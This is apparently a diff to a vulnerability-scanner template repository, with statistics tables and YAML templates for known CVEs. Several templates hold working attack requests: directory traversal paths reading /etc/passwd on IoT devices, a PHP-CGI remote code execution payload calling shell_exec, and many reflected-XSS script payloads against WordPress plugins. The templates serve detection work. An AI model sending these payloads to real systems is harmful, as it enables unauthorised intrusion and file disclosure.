| bullwark | 1 | bad5ect0r | 1 | | | | | | |
|
||||
| itop | 1 | regala_ | 1 | | | | | | |
|
||||
| nsasg | 1 | g4l1t0 and @convisoappsec | 1 | | | | | | |
|
||||
| rsyncd | 1 | rojanrijal | 1 | | | | | | |
|
||||
| primetek | 1 | streetofhackerr007 (rohit | 1 | | | | | | |
|
||||
| | | soni) | | | | | | | |
|
||||
| gateone | 1 | bing0o | 1 | | | | | | |
|
||||
| alerta | 1 | shelld3v | 1 | | | | | | |
|
||||
| 74cms | 1 | zhenwarx | 1 | | | | | | |
|
||||
| metinfo | 1 | _darrenmartyn | 1 | | | | | | |
|
||||
| huijietong | 1 | johnk3r | 1 | | | | | | |
|
||||
| xff | 1 | taielab | 1 | | | | | | |
|
||||
| st | 1 | cookiehanhoan | 1 | | | | | | |
|
||||
| webmin | 1 | 0xtavian | 1 | | | | | | |
|
||||
| postmessage | 1 | sicksec | 1 | | | | | | |
|
||||
| parentlink | 1 | | | | | | | | |
|
||||
| alertmanager | 1 | | | | | | | | |
|
||||
| darkstat | 1 | | | | | | | | |
|
||||
| visionhub | 1 | | | | | | | | |
|
||||
| realteo | 1 | | | | | | | | |
|
||||
| yii | 1 | | | | | | | | |
|
||||
| sprintful | 1 | | | | | | | | |
|
||||
| fortilogger | 1 | | | | | | | | |
|
||||
| maccmsv10 | 1 | | | | | | | | |
|
||||
| trilithic | 1 | | | | | | | | |
|
||||
| feifeicms | 1 | | | | | | | | |
|
||||
| jnoj | 1 | | | | | | | | |
|
||||
| netis | 1 | | | | | | | | |
|
||||
| xunchi | 1 | | | | | | | | |
|
||||
| interlib | 1 | | | | | | | | |
|
||||
| gogs | 1 | | | | | | | | |
|
||||
| opentsdb | 1 | | | | | | | | |
|
||||
| mailchimp | 1 | | | | | | | | |
|
||||
| akamai | 1 | | | | | | | | |
|
||||
| grav | 1 | | | | | | | | |
|
||||
| portainer | 1 | | | | | | | | |
|
||||
| cobub | 1 | | | | | | | | |
|
||||
| svnserve | 1 | | | | | | | | |
|
||||
| ntopng | 1 | | | | | | | | |
|
||||
| cve2010 | 1 | | | | | | | | |
|
||||
| hortonworks | 1 | | | | | | | | |
|
||||
| mirai | 1 | | | | | | | | |
|
||||
| redhat | 1 | | | | | | | | |
|
||||
| ilo4 | 1 | | | | | | | | |
|
||||
| mongoshake | 1 | | | | | | | | |
|
||||
| grails | 1 | | | | | | | | |
|
||||
| erp-nc | 1 | | | | | | | | |
|
||||
| spf | 1 | | | | | | | | |
|
||||
| setup | 1 | | | | | | | | |
|
||||
| aspnuke | 1 | | | | | | | | |
|
||||
| fiori | 1 | | | | | | | | |
|
||||
| domxss | 1 | | | | | | | | |
|
||||
| rmi | 1 | | | | | | | | |
|
||||
| harbor | 1 | | | | | | | | |
|
||||
| razor | 1 | | | | | | | | |
|
||||
| smartsense | 1 | | | | | | | | |
|
||||
| majordomo2 | 1 | | | | | | | | |
|
||||
| beanshell | 1 | | | | | | | | |
|
||||
| zcms | 1 | | | | | | | | |
|
||||
| enum | 1 | | | | | | | | |
|
||||
| linksys | 1 | | | | | | | | |
|
||||
| sco | 1 | | | | | | | | |
|
||||
| xml | 1 | | | | | | | | |
|
||||
| floc | 1 | | | | | | | | |
|
||||
| chinaunicom | 1 | | | | | | | | |
|
||||
| phalcon | 1 | | | | | | | | |
|
||||
| soar | 1 | | | | | | | | |
|
||||
| jenzabar | 1 | | | | | | | | |
|
||||
| flink | 1 | | | | | | | | |
|
||||
| exchange | 1 | | | | | | | | |
|
||||
| concrete | 1 | | | | | | | | |
|
||||
| empirecms | 1 | | | | | | | | |
|
||||
| openrestry | 1 | | | | | | | | |
|
||||
| varnish | 1 | | | | | | | | |
|
||||
| optiLink | 1 | | | | | | | | |
|
||||
| opm | 1 | | | | | | | | |
|
||||
| checkpoint | 1 | | | | | | | | |
|
||||
| octoprint | 1 | | | | | | | | |
|
||||
| faraday | 1 | | | | | | | | |
|
||||
| tika | 1 | | | | | | | | |
|
||||
| nuxeo | 1 | | | | | | | | |
|
||||
| uwsgi | 1 | | | | | | | | |
|
||||
| kerbynet | 1 | | | | | | | | |
|
||||
| fortiweb | 1 | | | | | | | | |
|
||||
| nps | 1 | | | | | | | | |
|
||||
| zmanda | 1 | | | | | | | | |
|
||||
| node | 1 | | | | | | | | |
|
||||
| upload | 1 | | | | | | | | |
|
||||
| discord | 1 | | | | | | | | |
|
||||
| vscode | 1 | | | | | | | | |
|
||||
| doh | 1 | | | | | | | | |
|
||||
| scs | 1 | | | | | | | | |
|
||||
| octobercms | 1 | | | | | | | | |
|
||||
| extractor | 1 | | | | | | | | |
|
||||
| bitly | 1 | | | | | | | | |
|
||||
| fuelcms | 1 | | | | | | | | |
|
||||
| webmodule-ee | 1 | | | | | | | | |
|
||||
| keenetic | 1 | | | | | | | | |
|
||||
| nette | 1 | | | | | | | | |
|
||||
| dlogin | 1 | | | | | | | | |
|
||||
| servicenow | 1 | | | | | | | | |
|
||||
| cocoon | 1 | | | | | | | | |
|
||||
| favicon | 1 | | | | | | | | |
|
||||
| mantisbt | 1 | | | | | | | | |
|
||||
| ns | 1 | | | | | | | | |
|
||||
| lansweeper | 1 | | | | | | | | |
|
||||
| bash | 1 | | | | | | | | |
|
||||
| ecom | 1 | | | | | | | | |
|
||||
| oscommerce | 1 | | | | | | | | |
|
||||
| servicedesk | 1 | | | | | | | | |
|
||||
| nexusdb | 1 | | | | | | | | |
|
||||
| webui | 1 | | | | | | | | |
|
||||
| expn | 1 | | | | | | | | |
|
||||
| jsp | 1 | | | | | | | | |
|
||||
| zzzcms | 1 | | | | | | | | |
|
||||
| openstack | 1 | | | | | | | | |
|
||||
| openerp | 1 | | | | | | | | |
|
||||
| javafaces | 1 | | | | | | | | |
|
||||
| csrf | 1 | | | | | | | | |
|
||||
| sqlite | 1 | | | | | | | | |
|
||||
| dotnetnuke | 1 | | | | | | | | |
|
||||
| opensmtpd | 1 | | | | | | | | |
|
||||
| stem | 1 | | | | | | | | |
|
||||
| panos | 1 | | | | | | | | |
|
||||
| netrc | 1 | | | | | | | | |
|
||||
| calendarix | 1 | | | | | | | | |
|
||||
| myucms | 1 | | | | | | | | |
|
||||
| dom | 1 | | | | | | | | |
|
||||
| centos | 1 | | | | | | | | |
|
||||
| fortinet | 1 | | | | | | | | |
|
||||
| memcached | 1 | | | | | | | | |
|
||||
| avtech | 1 | | | | | | | | |
|
||||
| lancom | 1 | | | | | | | | |
|
||||
| jenkin | 1 | | | | | | | | |
|
||||
| javascript | 1 | | | | | | | | |
|
||||
| fortigates | 1 | | | | | | | | |
|
||||
| apiman | 1 | | | | | | | | |
|
||||
| clave | 1 | | | | | | | | |
|
||||
| mediumish | 1 | | | | | | | | |
|
||||
| jsf | 1 | | | | | | | | |
|
||||
| landray | 1 | | | | | | | | |
|
||||
| tensorboard | 1 | | | | | | | | |
|
||||
| pulsesecure | 1 | | | | | | | | |
|
||||
| socomec | 1 | | | | | | | | |
|
||||
| blind | 1 | | | | | | | | |
|
||||
| turbocrm | 1 | | | | | | | | |
|
||||
| swagger | 1 | | | | | | | | |
|
||||
| npm | 1 | | | | | | | | |
|
||||
| tensorflow | 1 | | | | | | | | |
|
||||
| ssltls | 1 | | | | | | | | |
|
||||
| wso2 | 1 | | | | | | | | |
|
||||
| fastapi | 1 | | | | | | | | |
|
||||
| webadmin | 1 | | | | | | | | |
|
||||
| kafdrop | 1 | | | | | | | | |
|
||||
| episerver | 1 | | | | | | | | |
|
||||
| circontrorl | 1 | | | | | | | | |
|
||||
| ambari | 1 | | | | | | | | |
|
||||
| crm | 1 | | | | | | | | |
|
||||
| comodo | 1 | | | | | | | | |
|
||||
| tamronos | 1 | | | | | | | | |
|
||||
| cve2007 | 1 | | | | | | | | |
|
||||
| rdp | 1 | | | | | | | | |
|
||||
| jmx | 1 | | | | | | | | |
|
||||
| avalanche | 1 | | | | | | | | |
|
||||
| embedthis | 1 | | | | | | | | |
|
||||
| goahead | 1 | | | | | | | | |
|
||||
| k8s | 1 | | | | | | | | |
|
||||
| gitlist | 1 | | | | | | | | |
|
||||
| fedora | 1 | | | | | | | | |
|
||||
| mongo | 1 | | | | | | | | |
|
||||
| aura | 1 | | | | | | | | |
|
||||
| axis | 1 | | | | | | | | |
|
||||
| node-red-dashboard | 1 | | | | | | | | |
|
||||
| discourse | 1 | | | | | | | | |
|
||||
| powercreator | 1 | | | | | | | | |
|
||||
| zarafa | 1 | | | | | | | | |
|
||||
| dvwa | 1 | | | | | | | | |
|
||||
| opencast | 1 | | | | | | | | |
|
||||
| payara | 1 | | | | | | | | |
|
||||
| nomad | 1 | | | | | | | | |
|
||||
| upnp | 1 | | | | | | | | |
|
||||
| plastic | 1 | | | | | | | | |
|
||||
| bruteforce | 1 | | | | | | | | |
|
||||
| wildfly | 1 | | | | | | | | |
|
||||
| ruby | 1 | | | | | | | | |
|
||||
| livezilla | 1 | | | | | | | | |
|
||||
| panabit | 1 | | | | | | | | |
|
||||
| shopware | 1 | | | | | | | | |
|
||||
| linkedin | 1 | | | | | | | | |
|
||||
| vsphere | 1 | | | | | | | | |
|
||||
| netsweeper | 1 | | | | | | | | |
|
||||
| spectracom | 1 | | | | | | | | |
|
||||
| geutebruck | 1 | | | | | | | | |
|
||||
| weiphp | 1 | | | | | | | | |
|
||||
| jfrog | 1 | | | | | | | | |
|
||||
| dompdf | 1 | | | | | | | | |
|
||||
| mautic | 1 | | | | | | | | |
|
||||
| labtech | 1 | | | | | | | | |
|
||||
| selea | 1 | | | | | | | | |
|
||||
| sentry | 1 | | | | | | | | |
|
||||
| sarg | 1 | | | | | | | | |
|
||||
| flash | 1 | | | | | | | | |
|
||||
| zimbra | 1 | | | | | | | | |
|
||||
| fortigate | 1 | | | | | | | | |
|
||||
| cgi | 1 | | | | | | | | |
|
||||
| kubeflow | 1 | | | | | | | | |
|
||||
| kong | 1 | | | | | | | | |
|
||||
| nedi | 1 | | | | | | | | |
|
||||
| esmtp | 1 | | | | | | | | |
|
||||
| monitorix | 1 | | | | | | | | |
|
||||
| salesforce | 1 | | | | | | | | |
|
||||
| woocomernce | 1 | | | | | | | | |
|
||||
| jquery | 1 | | | | | | | | |
|
||||
| drone | 1 | | | | | | | | |
|
||||
| tongda | 1 | | | | | | | | |
|
||||
| k8 | 1 | | | | | | | | |
|
||||
| csod | 1 | | | | | | | | |
|
||||
| wp-theme | 1 | | | | | | | | |
|
||||
| tileserver | 1 | | | | | | | | |
|
||||
| traefik | 1 | | | | | | | | |
|
||||
| moin | 1 | | | | | | | | |
|
||||
| moinmoin | 1 | | | | | | | | |
|
||||
| liferay | 1 | | | | | | | | |
|
||||
| timesheet | 1 | | | | | | | | |
|
||||
| phpunit | 1 | | | | | | | | |
|
||||
| rabbitmq | 1 | | | | | | | | |
|
||||
| netdata | 1 | | | | | | | | |
|
||||
| redis | 1 | | | | | | | | |
|
||||
| cloudinary | 1 | | | | | | | | |
|
||||
| zeroshell | 1 | | | | | | | | |
|
||||
| linkerd | 1 | | | | | | | | |
|
||||
| svn | 1 | | | | | | | | |
|
||||
| druid | 1 | | | | | | | | |
|
||||
| sitecore | 1 | | | | | | | | |
|
||||
| plugin | 1 | | | | | | | | |
|
||||
| blackboard | 1 | | | | | | | | |
|
||||
| jitsi | 1 | | | | | | | | |
|
||||
| b2evolution | 1 | | | | | | | | |
|
||||
| clusterengine | 1 | | | | | | | | |
|
||||
| plc | 1 | | | | | | | | |
|
||||
| htmli | 1 | | | | | | | | |
|
||||
| tapestry | 1 | | | | | | | | |
|
||||
| gloo | 1 | | | | | | | | |
|
||||
| haproxy | 1 | | | | | | | | |
|
||||
| gridx | 1 | | | | | | | | |
|
||||
| spidercontrol | 1 | | | | | | | | |
|
||||
| dotnet | 1 | | | | | | | | |
|
||||
| rfi | 1 | | | | | | | | |
|
||||
| springframework | 1 | | | | | | | | |
|
||||
| hasura | 1 | | | | | | | | |
|
||||
| pippoint | 1 | | | | | | | | |
|
||||
| skywalking | 1 | | | | | | | | |
|
||||
| rubedo | 1 | | | | | | | | |
|
||||
| diris | 1 | | | | | | | | |
|
||||
| pyramid | 1 | | | | | | | | |
|
||||
| biometrics | 1 | | | | | | | | |
|
||||
| wmt | 1 | | | | | | | | |
|
||||
| appweb | 1 | | | | | | | | |
|
||||
| zend | 1 | | | | | | | | |
|
||||
| etouch | 1 | | | | | | | | |
|
||||
| codeigniter | 1 | | | | | | | | |
|
||||
| bolt | 1 | | | | | | | | |
|
||||
| 2014 | 1 | | | | | | | | |
|
||||
| tpshop | 1 | | | | | | | | |
|
||||
| timeclock | 1 | | | | | | | | |
|
||||
| mpsec | 1 | | | | | | | | |
|
||||
| symfony | 1 | | | | | | | | |
|
||||
| webftp | 1 | | | | | | | | |
|
||||
| mcafee | 1 | | | | | | | | |
|
||||
| acme | 1 | | | | | | | | |
|
||||
| mysql | 1 | | | | | | | | |
|
||||
| klog | 1 | | | | | | | | |
|
||||
| spring | 1 | | | | | | | | |
|
||||
| geddy | 1 | | | | | | | | |
|
||||
| finereport | 1 | | | | | | | | |
|
||||
| cors | 1 | | | | | | | | |
|
||||
| emby | 1 | | | | | | | | |
|
||||
| cve2005 | 1 | | | | | | | | |
|
||||
| backdoor | 1 | | | | | | | | |
|
||||
| idemia | 1 | | | | | | | | |
|
||||
| robomongo | 1 | | | | | | | | |
|
||||
| blue-ocean | 1 | | | | | | | | |
|
||||
| horde | 1 | | | | | | | | |
|
||||
| phpinfo | 1 | | | | | | | | |
|
||||
| vsftpd | 1 | | | | | | | | |
|
||||
| ems | 1 | | | | | | | | |
|
||||
| rujjie | 1 | | | | | | | | |
|
||||
| pgadmin | 1 | | | | | | | | |
|
||||
| ioncube | 1 | | | | | | | | |
|
||||
| wazuh | 1 | | | | | | | | |
|
||||
| nordex | 1 | | | | | | | | |
|
||||
| status | 1 | | | | | | | | |
|
||||
| cse | 1 | | | | | | | | |
|
||||
| viewpoint | 1 | | | | | | | | |
|
||||
| proftpd | 1 | | | | | | | | |
|
||||
| kyan | 1 | | | | | | | | |
|
||||
| firebase | 1 | | | | | | | | |
|
||||
| targa | 1 | | | | | | | | |
|
||||
| acexy | 1 | | | | | | | | |
|
||||
| codemeter | 1 | | | | | | | | |
|
||||
| redwood | 1 | | | | | | | | |
|
||||
| heroku | 1 | | | | | | | | |
|
||||
| alibaba | 1 | | | | | | | | |
|
||||
| arl | 1 | | | | | | | | |
|
||||
| circontrol | 1 | | | | | | | | |
|
||||
| lotuscms | 1 | | | | | | | | |
|
||||
| jeewms | 1 | | | | | | | | |
|
||||
| zenario | 1 | | | | | | | | |
|
||||
| zm | 1 | | | | | | | | |
|
||||
| emc | 1 | | | | | | | | |
|
||||
| ulterius | 1 | | | | | | | | |
|
||||
| ricoh | 1 | | | | | | | | |
|
||||
| triconsole | 1 | | | | | | | | |
|
||||
| anchorcms | 1 | | | | | | | | |
|
||||
| email | 1 | | | | | | | | |
|
||||
| synnefo | 1 | | | | | | | | |
|
||||
| viewlinc | 1 | | | | | | | | |
|
||||
| wuzhicms | 1 | | | | | | | | |
|
||||
| subrion | 1 | | | | | | | | |
|
||||
| wiki | 1 | | | | | | | | |
|
||||
| saltapi | 1 | | | | | | | | |
|
||||
| nc2 | 1 | | | | | | | | |
|
||||
| postgres | 1 | | | | | | | | |
|
||||
| eyou | 1 | | | | | | | | |
|
||||
| pacsone | 1 | | | | | | | | |
|
||||
| plone | 1 | | | | | | | | |
|
||||
| sidekiq | 1 | | | | | | | | |
|
||||
| tenda | 1 | | | | | | | | |
|
||||
| zookeeper | 1 | | | | | | | | |
|
||||
| ueditor | 1 | | | | | | | | |
|
||||
| wooyun | 1 | | | | | | | | |
|
||||
| opensns | 1 | | | | | | | | |
|
||||
| wamp | 1 | | | | | | | | |
|
||||
| ec2 | 1 | | | | | | | | |
|
||||
| totaljs | 1 | | | | | | | | |
|
||||
| ganglia | 1 | | | | | | | | |
|
||||
| rhymix | 1 | | | | | | | | |
|
||||
| shopxo | 1 | | | | | | | | |
|
||||
| wifisky | 1 | | | | | | | | |
|
||||
| wavemaker | 1 | | | | | | | | |
|
||||
| krweb | 1 | | | | | | | | |
|
||||
| rmc | 1 | | | | | | | | |
|
||||
| mdb | 1 | | | | | | | | |
|
||||
| clockwatch | 1 | | | | | | | | |
|
||||
| mobileiron | 1 | | | | | | | | |
|
||||
| adminer | 1 | | | | | | | | |
|
||||
| yachtcontrol | 1 | | | | | | | | |
|
||||
| zte | 1 | | | | | | | | |
|
||||
| igs | 1 | | | | | | | | |
|
||||
| duomicms | 1 | | | | | | | | |
|
||||
| landrayoa | 1 | | | | | | | | |
|
||||
| xdcms | 1 | | | | | | | | |
|
||||
| mara | 1 | | | | | | | | |
|
||||
| thinkadmin | 1 | | | | | | | | |
|
||||
| cloudflare | 1 | | | | | | | | |
|
||||
| db | 1 | | | | | | | | |
|
||||
| bookstack | 1 | | | | | | | | |
|
||||
| szhe | 1 | | | | | | | | |
|
||||
| fastcgi | 1 | | | | | | | | |
|
||||
| dvr | 1 | | | | | | | | |
|
||||
| starttls | 1 | | | | | | | | |
|
||||
| seacms | 1 | | | | | | | | |
|
||||
| glances | 1 | | | | | | | | |
|
|
@ -0,0 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 467 | dhiyaneshdk | 202 | cves | 473 | info | 453 | http | 1409 |
|
||||
| panel | 201 | pdteam | 184 | vulnerabilities | 230 | high | 395 | file | 42 |
|
||||
| xss | 169 | pikpikcu | 177 | exposed-panels | 202 | medium | 313 | network | 32 |
|
||||
| wordpress | 164 | dwisiswant0 | 113 | exposures | 150 | critical | 187 | dns | 10 |
|
||||
| rce | 162 | geeknik | 89 | technologies | 129 | low | 150 | | |
|
||||
| exposure | 154 | daffainfo | 79 | misconfiguration | 114 | | | | |
|
||||
| cve2020 | 137 | madrobot | 59 | takeovers | 70 | | | | |
|
||||
| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | |
|
||||
| wp-plugin | 110 | gaurang | 42 | file | 42 | | | | |
|
||||
| cve2019 | 82 | gy741 | 36 | workflows | 33 | | | | |
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2010-2307
|
||||
|
||||
info:
|
||||
name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
|
||||
reference: |
|
||||
- https://www.securityfocus.com/bid/40550/info
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
|
||||
tags: cve,cve2010,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2010-4231
|
||||
|
||||
info:
|
||||
name: Camtron CMNC-200 IP Camera - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
|
||||
- https://www.exploit-db.com/exploits/15505
|
||||
tags: cve,cve2010,iot,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123)</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2012-1823
|
||||
|
||||
info:
|
||||
name: PHP CGI v5.3.12/5.4.2 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: |
|
||||
- https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-1823
|
||||
description: |
|
||||
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
|
||||
tags: rce,php,cve,cve2012
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 31
|
||||
|
||||
<?php echo shell_exec("cat /etc/passwd"); ?>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -11,7 +11,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
# - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
|
||||
|
@ -21,7 +21,7 @@ requests:
|
|||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(123);</script>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -11,13 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%22%3E%3Cimg%2Fsrc%3Dx%20onerror%3Dalert%28123%29%3E'
|
||||
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<img/src=x onerror=alert(123)>"
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
